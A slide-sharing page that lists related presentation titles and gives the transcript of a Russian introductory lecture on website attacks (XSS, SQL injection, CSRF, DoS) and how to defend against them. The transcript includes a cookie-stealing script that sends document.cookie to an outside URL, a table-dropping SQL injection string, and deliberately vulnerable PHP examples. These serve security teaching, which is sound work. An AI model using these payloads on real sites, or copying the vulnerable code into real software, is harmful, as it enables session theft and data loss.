Уязвимость сайтов и обеспечение их безопасности. Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации.

Slides:

Advertisements

Similar presentations

Nick Feamster CS 6262 Spring 2009

Advertisements

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

«Владея информацией, владеешь миром». ЗНАЕТЕ ЛИ ВЫ, ЧТО ПРОИСХОДИТ В ВАШЕЙ КОМПАНИИ? LanAgent «В ладея информацией, владеешь миром »

Into the Mind of the Hacker: Hands-On Web Application Hacking Adam Doupé University of California, Santa Barbara 4/23/12.

Технологии для создания защищенных сайтов государственных органов Артем Рябинков Ведущий аналитик компании «1С-Битрикс»

Microsoft TechDayshttp:// Комаров Михаил MCT.

LOGO КСЗИ «Панцирь-К» ЗАЩИТА конфиденциальной информации и персональных данных конфиденциальной информации и персональных данных.

Тушин Александр, ЗАО «Компания Либэр». 1) Предоставление полнотекстовых материалов 2) Поиск по внутреннему содержанию документа 3) Доступность в режиме.

Социальный инжиниринг и социальные сети Актуальные угрозы для пользователей социальных сетей.

Ответы на вопросы 7 июля « Подготовка паспортов безопасности» тел: (495) Экологический Синтезирующий.

 Нужно много различных протоколов связи  Каждый из них может реализовываться на разных платформах Современные сети Много устройств, компьютеров и сетей.

Почему, на Ваш взгляд, в роли рационирующего субъекта как правило выступает коллективный орган?

Information Networking Security and Assurance Lab National Chung Cheng University WebGoat.

Демидов А.В г. Операционные системы Лекция 4 Работа с файлами.

AppSec USA 2014 Denver, Colorado CSRF 101 Introduction to Cross-Site Request Forgery.

Chapter 4 Application Security Knowledge and Test Prep

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Microsoft TechDayshttp:// Леонид Шапиро MCT, MVP ЦКО «Специалист»

March Intensive: XSS Exploits

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Workshop 3 Web Application Security Li Weichao March

SQL Server and Application Security for Developers

* ASP.NET Web Security SQL Injection, XSS, CSRF, Parameter Tampering, DoS Attacks, Session Hijacking ASP.NET MVC Telerik Software Academy

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Lecture 16. OWASP: The Open Web Application Security Project

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.

Security testing of study information system Security team: Matis Alliksoo Alo Konno Urmo Lihten Taavi Podzuks Sander Saarm.

Ryan Dewhurst - 20th March 2012 Web Application (PHP) Security.

Krishna Mohan Koyya Glarimy Technology Services

Security+ Guide to Network Security Fundamentals, Fourth Edition

Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.

OWASP Top 10 from a developer’s perspective John Wilander, OWASP/Omegapoint, IBWAS’10.

MIS Week 7 Site:

The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.

Input Validation – common associated risks  ______________ user input controls SQL statements ultimately executed by a database server

1 The current lesson plans provided for in Webgoatv2 include Http Basics How to Perform Database Cross Site Scripting (XSS) How to Spoof an Authentication.

Security (Keep your site secure at extension level) Sergey Gorstka Fastw3b.

Web system security issues: A developer's perspective Morrison, P. Jason 9 December 2004 BAD Information Security Web system security issues:

Web Security SQL Injection, XSS, CSRF, Parameter Tampering, DoS Attacks, Session Hijacking SoftUni Team Technical Trainers Software University

JACEK KOPCZYNSKI: DEVELOPER YAMEL PERAZA: DEVELOPER MADOUD SADJADI: MENTOR MADOUD SADJADI: PRODUCT OWNER Senior Project Website Version 5 FINAL PRESENTATION.

Разработка безопасных проектов с использованием Bitrix Framework.

Evil Code and how to defend against it CSCI 4300

Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.

What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.

Week 7 - Wednesday.  Web security – user side.

SQL Server and Application Security for Developers Mladen Prajdić SQL Server

Carrie Estes Collin Donaldson.  Zero day attacks  “zero day”  Web application attacks  Signing up for a class  Hardening the web server  Enhancing.

ColdFusion: Code Security Best Practices Presented at CCFUG Mar 2016 By Denard Springle.

Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.

SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.

Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.

Building Secure ColdFusion Applications

Introduction to Dynamic Web Programming

What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.

Yii - For the Future - Gen Web Development Platform

ADO.NET Data Services (codename Astoria)

Riding Someone Else’s Wave with CSRF

امنیت نرم‌افزارهای وب تقديم به پيشگاه مقدس امام عصر (عج) عباس نادری

CSC 495/583 Topics of Software Security Intro to Web Security

Advanced Penetration testing

PHP: Combo box FdSc Module 109 Server side scripting and

Web Programming Language

WWW安全國立暨南國際大學資訊管理學系陳彥錚.

Presentation transcript:

Уязвимость сайтов и обеспечение их безопасности

Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации Выведение сайтов из строя, удаление данных Замена содержимого сайтов, размещение рекламной информации

Предметы атак на сайты WWW-сервера: Операционная система HTTP-сервер Серверные расширения Веб-приложения WWW-клиенты: Операционная система (внедрение вирусов) Получение cookie, хранящихся на компьютере

Виды сетевых атак DoS-атаки и DDoS-атаки ( Distributed Denial of Service ) Фишинг (phishing) ip-спуфинг (spoofing) Троянский конь (Spyware) drive-by download (загрузка программ на сервер) Cross-Site Scripting (CSS) (HTML injection) SQL injection XSS (межсайтовый скриптинг) CSRF (Cross-site request forgery) Атака одного клика Без использования сетевых средств

HTML injection window.open(" t.cgi?cookie="+document.cookie)

SQL injection $firstname = $_POST["firstname"]; mysql_query("SELECT * FROM users WHERE first_name='$firstname'"); Если firstname = "'; drop table users; #", то код удалит таблицу пользователей

XSS (межсайтовый скриптинг) $firstname = $_GET["firstname"]; echo "Your name: $firstname"; Если firstname = " … ", то скрипт будет выполнен Достаточно дать пользователям ссылку …

CSRF Атака одного клика Заставить клиента выполнить нужный запрос

Защита от интернет-атак Защита на стороне сервера: Настройка прав на компьютере-сервере Настройка http-сервера Аккуратное программирование на стороне сервера Проверка входящих http-запросов Защита на клиенте: Общая антивирусная защита Проверка входящего http-трафика Настройки безопасности браузеров Разумные методы хранения паролей и конфиденциальных данных